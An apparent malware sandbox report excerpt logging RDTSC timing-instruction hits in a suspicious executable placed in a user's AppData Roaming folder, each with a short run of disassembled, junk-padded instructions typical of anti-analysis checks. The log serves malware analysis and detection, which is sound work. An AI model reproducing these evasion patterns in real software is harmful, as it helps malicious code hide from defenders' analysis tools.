Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51D96F second address: 51D987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2738B89E13h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51D987 second address: 51D98C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51D98C second address: 51D9BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E15h 0x00000009 popad 0x0000000a jmp 00007F2738B89E0Dh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51D9BB second address: 51D9C7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2738E98EE6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51D9C7 second address: 51D9CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51D9CF second address: 51D9E0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2738E98EE6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51DB3B second address: 51DB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E12h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2738B89E10h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51DB66 second address: 51DB78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51DB78 second address: 51DBA2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F2738B89E06h 0x00000009 pop esi 0x0000000a js 00007F2738B89E08h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 jng 00007F2738B89E06h 0x0000001f popad 0x00000020 jmp 00007F2738B89E0Ah 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51DBA2 second address: 51DBAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2738E98EE6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51DD4E second address: 51DD54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51DD54 second address: 51DD58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 525079 second address: 52507F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5251BB second address: 525200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F2738E98EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2738E98EF7h 0x00000011 jmp 00007F2738E98EF8h 0x00000016 popad 0x00000017 pushad 0x00000018 jnp 00007F2738E98EF2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 525200 second address: 525206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 525206 second address: 525227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2738E98EF9h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 525CEC second address: 525CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 525CF0 second address: 525D12 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2738E98EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F2738E98EF2h 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 525FBD second address: 525FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5265AB second address: 5265C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2738E98EF1h 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 52E011 second address: 52E02E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738B89E19h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 52E02E second address: 52E03C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2738E98EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 52E03C second address: 52E052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E12h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 52E1BD second address: 52E1D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jno 00007F2738E98EE6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 52E348 second address: 52E364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738B89E18h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 52E364 second address: 52E368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 52E8B4 second address: 52E8B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 52E8B8 second address: 52E8BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 52EA4B second address: 52EA80 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F2738B89E17h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2738B89E15h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53465D second address: 534661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5347D4 second address: 5347DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 534AA6 second address: 534ABF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EEDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 534DFB second address: 534E24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E19h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007F2738B89E0Ah 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 534E24 second address: 534E60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jp 00007F2738E98EE6h 0x0000000f popad 0x00000010 jmp 00007F2738E98EEDh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jg 00007F2738E98EE6h 0x00000020 jmp 00007F2738E98EF4h 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5353E9 second address: 5353ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5353ED second address: 5353F9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2738E98EE6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5355C2 second address: 5355CE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2738B89E06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5355CE second address: 5355D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F2738E98EE6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 535CF6 second address: 535CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 534241 second address: 534245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 534245 second address: 53426A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2738B89E06h 0x00000008 jmp 00007F2738B89E13h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007F2738B89E0Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53426A second address: 53426E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53426E second address: 53428A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F2738B89E16h 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53428A second address: 5342A6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F2738E98EF2h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53BDB8 second address: 53BDD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E16h 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F2738B89E06h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53BDD8 second address: 53BDDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53F033 second address: 53F047 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2738B89E06h 0x00000008 jnl 00007F2738B89E06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53F047 second address: 53F04D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53F04D second address: 53F051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53EBFA second address: 53EBFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 54A79F second address: 54A7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E15h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F2738B89E20h 0x00000012 jmp 00007F2738B89E14h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 54A7D7 second address: 54A7DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 54A7DB second address: 54A7F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F2738B89E06h 0x00000009 jmp 00007F2738B89E0Fh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 553D0B second address: 553D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 553D11 second address: 553D30 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jne 00007F2738B89E06h 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2738B89E0Ch 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56083C second address: 56086B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jnp 00007F2738E98EE6h 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2738E98EEFh 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56064D second address: 560651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56707E second address: 567082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 567082 second address: 56708E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 568659 second address: 56865D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56865D second address: 568661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 568661 second address: 56866A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 569B28 second address: 569B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2738B89E06h 0x0000000a jmp 00007F2738B89E15h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F2738B89E12h 0x00000016 jmp 00007F2738B89E15h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56EA31 second address: 56EA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56EA35 second address: 56EA39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56EB79 second address: 56EB83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56EB83 second address: 56EB8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56EE42 second address: 56EE4D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007F2738E98EE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56EFB4 second address: 56EFEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2738B89E16h 0x00000008 jmp 00007F2738B89E0Bh 0x0000000d jmp 00007F2738B89E12h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56F17A second address: 56F180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56F2B8 second address: 56F2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E0Ch 0x00000009 popad 0x0000000a pushad 0x0000000b jne 00007F2738B89E06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56F2D2 second address: 56F2E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007F2738E98EE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56F2E2 second address: 56F2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56F2E8 second address: 56F2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56FD3A second address: 56FD52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738B89E14h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56FD52 second address: 56FD56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56FD56 second address: 56FD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F2738B89E0Eh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5ACFDB second address: 5ACFE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5ACFE0 second address: 5ACFE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5ACFE6 second address: 5ACFF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5ACFF2 second address: 5ACFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5ACFF8 second address: 5ACFFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5ABF50 second address: 5ABF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2738B89E0Ch 0x0000000b popad 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5ABF68 second address: 5ABF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007F2738E98EE8h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5AC0D0 second address: 5AC0D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5AC3F0 second address: 5AC3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5AC3F5 second address: 5AC421 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2738B89E14h 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F2738B89E12h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5AC8AE second address: 5AC8E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738E98EF8h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jmp 00007F2738E98EEAh 0x00000010 jmp 00007F2738E98EEEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5ACBA3 second address: 5ACBA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5AF8BF second address: 5AF8D6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2738E98EE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007F2738E98EF8h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5AF8D6 second address: 5AF8DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5AF8DA second address: 5AF8DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
